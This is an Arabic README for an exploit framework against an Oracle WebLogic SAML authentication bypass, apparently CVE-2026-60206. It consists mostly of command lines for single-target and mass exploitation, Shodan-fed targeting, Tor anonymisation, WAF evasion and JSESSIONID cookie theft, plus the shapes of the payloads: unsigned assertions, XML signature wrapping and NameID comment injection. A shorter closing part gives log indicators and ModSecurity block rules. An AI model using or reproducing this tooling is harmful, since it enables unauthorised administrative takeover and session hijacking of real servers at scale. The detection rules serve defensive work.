
👾 CVE-2026-60206 - إطار عمل استغلال تجاوز مصادقة SAML في Oracle WebLogic ⚡إصدارات Bash وPython. الميزات: --detect فحص آمن، --exploit combo/unsigned/xsw/nameid/all، --shodan التكامل، --tor الدعم، المسح الجماعي، إخراج JSON/CSV/JSONL، التحقق من صحة ملفات تعريف الارتباط. 🛡️ CVSS 9.9 حرجة - استخدمه بأخلاقية، والتزم بالقانون. 🔒

إطار عمل استغلال وماسح ضوئي شامل
لأغراض اختبار الاختراق المصرح به فقط.
تم توفير هذه الأداة لأغراض تعليمية ولاختبار الاختراق المصرح به فقط.
المؤلفون والمساهمون غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج. يتحمل المستخدمون وحدهم مسؤولية التأكد من حصولهم على إذن كتابي صريح من مالك الهدف قبل الاختبار. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني بموجب قانون الاحتيال وإساءة استخدام الحاسوب (CFAA) والقوانين المماثلة في جميع أنحاء العالم.
باستخدامك لهذا البرنامج، فأنت توافق على:
⚠️ تحذير: يتم استغلال هذه الثغرة بنشاط في البيئات الحقيقية. قد يؤدي الاستخدام غير المصرح به إلى عواقب قانونية وخيمة.
CVE-2026-60206 هي ثغرة حرجة لتجاوز المصادقة دون الحاجة إلى مصادقة مسبقة في تطبيق SAML (لغة ترميز تأكيد الأمان) في خادم Oracle WebLogic Server. وهي تسمح للمهاجمين عن بُعد بتجاوز مصادقة SAML والحصول على وصول إداري إلى وحدة تحكم WebLogic دون بيانات اعتماد صالحة.
حقن SAML: تنبع الثغرة من التحقق غير السليم من تأكيدات SAML. يمكن للمهاجمين صياغة استجابات SAML خبيثة تتجاوز فحوصات المصادقة.
تجاوز التوقيع: تسمح الثغرة بتجاوز التحقق من توقيع XML عبر هجمات تغليف توقيع XML (XSW)، حيث يقوم المهاجمون بتغليف تأكيدات خبيثة بتوقيعات شرعية.
التلاعب بـ NameID: يمكن للمهاجمين حقن تعليقات أو التلاعب بحقل NameID لانتحال هوية المستخدمين المميزين.
الوصول الإداري: يمنح الاستغلال الناجح المهاجم وصولاً إدارياً إلى وحدة تحكم خادم WebLogic مع سيطرة كاملة.
يجمع الاستغلال التعليمي متعدد النواقل الشامل عدة نواقل هجوم SAML لتحقيق تجاوز المصادقة، مع ميزات متقدمة للمسح الشامل وسرقة ملفات تعريف الارتباط والوصول الإداري.
--detect)يقوم المُتحقق الآمن باكتشاف غير تطفلي للثغرة دون تنفيذ حمولات ضارة أو إجراء تغييرات على النظام.
curl (لنسخة Bash)pip (لمكتبة requests، لنسخة Python)# Python version
pip install requests urllib3
# Optional: Shodan support
pip install shodan
# Bash version: curl only (no additional dependencies)
[!NOTE] تعمل نسخة Bash باستخدام
curlفقط دون أي تبعيات خارجية. تتطلب نسخة Python مكتبتيrequestsوurllib3(اختياري:shodanلتكامل Shodan).
exploit.py)# Single target exploit (combo mode)
python exploit.py -u https://192.168.1.100:7002 --exploit --user admin
# Exploit with all attack vectors
python exploit.py -u https://192.168.1.100:7002 --mode all --exploit -v
# Mass scanning from file (50 threads)
python exploit.py -l targets.txt --exploit -t 50 -o results.json
# Safe detection only (non-intrusive)
python exploit.py -l targets.txt --detect -o scan_results.csv
# Shodan integration
export SHODAN_API_KEY="your_api_key"
python exploit.py --shodan --shodan-query "WebLogic Server port:7002" --exploit
# Tor anonymized scanning
python exploit.py -l targets.txt --exploit --tor -t 20
# Proxy support
python exploit.py -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080
# Streaming JSONL output (memory efficient for large scans)
python exploit.py -l targets.txt --exploit -o results.jsonl
# Quiet mode (minimal output)
python exploit.py -l targets.txt --exploit -q -o results.json
# Custom timeout and retry
python exploit.py -u https://192.168.1.100:7002 --exploit --timeout 20 --retry 5 --delay 2.0
# SSL verification bypass
python exploit.py -u https://192.168.1.100:7002 --exploit --no-verify
# Verbose debugging
python exploit.py -u https://192.168.1.100:7002 --exploit -v
# Single target exploit
./exploit.sh -u https://192.168.1.100:7002 --exploit --user admin
# Mass scanning
./exploit.sh -l targets.txt --mode all --exploit -o results.json
# Tor anonymized scanning
./exploit.sh -l targets.txt --exploit --tor -t 20
# Shodan integration
export SHODAN_API_KEY="your_api_key"
./exploit.sh --shodan --exploit -o shodan_results.json
# Streaming JSONL output
./exploit.sh -l targets.txt --exploit -o results.jsonl
# Proxy support
./exploit.sh -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080
# SSL verification bypass
./exploit.sh -u https://192.168.1.100:7002 --exploit --no-verify
# Quiet mode
./exploit.sh -l targets.txt --exploit -q -o results.json
# Verbose debugging
./exploit.sh -u https://192.168.1.100:7002 --exploit -v
# Single target validation
./verifier_poc.sh -u https://192.168.1.100:7002 --user admin
# Mass validation with report
./verifier_poc.sh -l targets.txt --user admin -o report.txt
# SSL verification bypass
./verifier_poc.sh -u https://192.168.1.100:7002 --no-verify
# Proxy support
./verifier_poc.sh -u https://192.168.1.100:7002 --proxy http://127.0.0.1:8080
⚠️ مهم: تؤثر هذه الثغرة على نشر خادم WebLogic المستضاف ذاتياً. طبّق Oracle CPU يوليو 2026 فوراً.
تسمح الثغرة للمهاجمين بتجاوز مصادقة SAML من خلال صياغة استجابات SAML خبيثة لا يتم التحقق منها بشكل صحيح بواسطة تطبيق SAML في WebLogic.
نقطة النهاية المعرضة للثغرة:
POST /saml2/sp/acs HTTP/1.1
Host: target:7002
Content-Type: application/x-www-form-urlencoded
SAMLResponse=<base64_encoded_malicious_assertion>&RelayState=/
تأكيد غير موقّع
saml2:Assertion saml2:Subject <saml2:NameID Format="...">admin</saml2:NameID> </saml2:Subject>
</saml2:Assertion>
تغليف توقيع XML (XSW)
ds:Signature <ds:Reference URI="#legit"> </ds:Reference> </ds:Signature>
<saml2:Assertion ID="evil"> saml2:Subjectadmin</saml2:Subject> </saml2:Assertion>
حقن تعليقات في NameID
<saml2:NameID Format="...">
lowpriv</saml2:NameID>
يؤدي الاستغلال الناجح إلى الحصول على ملف تعريف ارتباط JSESSIONID، مما يمنح وصولاً إدارياً إلى وحدة تحكم WebLogic.
يمكن استخدام ملف تعريف الارتباط المسروق للوصول إلى:
ابحث في سجلات WebLogic عن:
access.log – طلبات إلى /saml2/sp/acs أو /saml2/acs مع معاملات SAML غير معتادةdomain.log – محاولات تجاوز المصادقة مع تأكيدات SAML غير صالحةdiagnostic.log – أخطاء تحليل SAML أو فشل التحقق من التوقيعSAMLResponse تحتوي على:
<saml2:Assertion> متعددة<saml2:NameID>javascript: أو eval() في المعاملاتconfig.xml, jps-config.xml)autodeployweblogic.security معدلة# Block SAML requests with multiple assertions
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
"id:10001,phase:1,deny,status:403,\
msg:'CVE-2026-60206 - Multiple SAML Assertions',\
chain"
SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*<saml2:Assertion>.*"
# Block SAML requests with comments in NameID
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
"id:10002,phase:1,deny,status:403,\
msg:'CVE-2026-60206 - NameID Comments',\
chain"
SecRule ARGS:SAMLResponse ".*<saml2:NameID.*<!--.*-->.*"
# Block unsigned SAML assertions
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
"id:10003,phase:1,deny,status:403,\
msg:'CVE-2026-60206 - Unsigned Assertion',\
chain"
SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*(?!<ds:Signature>).*"
| الخاصية | القيمة |
|---|
| 📅 تاريخ الاكتشاف | يوليو 2026 (Oracle CPU) |
| ⚠️ درجة CVSS | 9.9 (حرجة) |
| 📋 CISA KEV | أُضيف في 21 يوليو 2026 |
| 🎯 المنتجات المتأثرة | Oracle WebLogic Server (Fusion Middleware) |
| 🔄 الإصدارات المُصلَّحة | Oracle CPU يوليو 2026 |
| 🔓 المصادقة | غير مطلوبة (قبل المصادقة) |
| 🌍 الاستغلال النشط | مؤكد في البيئات الحقيقية (يوليو 2026) |
| الميزة | الوصف |
|---|
| 🚀 استغلال متعدد النواقل | 7 نواقل هجوم: unsigned, xsw_v1-4, nameid, combo |
| 💻 مسح شامل | مسح متزامن مع تجمع خيوط (Python) / FIFO (Bash) |
| 🔐 سرقة ملفات تعريف الارتباط | يسرق JSESSIONID لاختطاف الجلسات |
| 👑 الوصول إلى وحدة التحكم الإدارية | وصول إداري كامل إلى وحدة تحكم WebLogic |
| 📁 اكتشاف الإصدار | يكتشف إصدارات WebLogic وحالة الثغرة الأمنية |
| 🌐 مسح دفعات | استغلال جماعي لأهداف متعددة مع خيوط المعالجة |
| 🎯 اكتشاف آمن | علامة --detect اختيارية للتحقق غير التطفلي من الثغرة |
| 🧩 تكامل Shodan | تحميل الأهداف مباشرة من بحث Shodan |
| 🔍 دعم Tor | إخفاء هوية المسح عبر وكيل Tor |
| 📊 صيغ إخراج متعددة | إخراج متدفق بصيغ JSON وCSV وJSONL |
| 🪟 متعدد المنصات | يدعم Linux وmacOS وBSD وAlpine وWSL |
| 🔒 آمن للخيوط | يستخدم آليات قفل للعمليات المتزامنة |
| 📋 حفظ الجلسة تلقائياً | يحفظ ملفات تعريف الارتباط الناجحة لاستخدامها لاحقاً |
| ⚙️ تجاوز WAF | تدوير User-Agent وتأخيرات عشوائية |
| الناقل | الوصف |
|---|
unsigned | تأكيد SAML غير مصادق عليه بدون توقيع |
xsw_v1 | تغليف توقيع XML - تأكيدات متعددة |
xsw_v2 | XSW - تجاوز التوقيع المُغلَّف |
xsw_v3 | XSW - التلاعب بمساحات الأسماء |
xsw_v4 | XSW - حقن تأكيدات متعددة |
nameid | حقن تعليقات في NameID |
combo | هجوم مدمج (unsigned + XSW + NameID) |
| الميزة | الوصف |
|---|
| 🔍 اكتشاف WebLogic | يحدد نسخ WebLogic عبر LoginForm.jsp |
| 📊 اكتشاف الإصدار | يكتشف إصدارات WebLogic المحددة ومستويات التصحيحات |
| 🧪 اكتشاف نقاط نهاية SAML | يختبر نقاط نهاية SAML ACS |
| 🔒 غير تطفلي | يحدد الإصدارات المعرضة للثغرة فقط |
| 📋 إخراج JSON/CSV | تصدير النتائج للتقارير |
| 🔄 مسح شامل | مسح أهداف متعددة مع دعم خيوط المعالجة |
| إصدار Oracle WebLogic | الحالة |
|---|
| 12.2.1.4.0 | 🔴 عرضة للثغرة |
| 14.1.1.0.0 | 🔴 عرضة للثغرة |
| 14.1.2.0.0 | 🔴 عرضة للثغرة |
| 15.1.1.0.0 | 🔴 عرضة للثغرة |
| إصدارات أخرى | تحقق من Oracle CPU يوليو 2026 |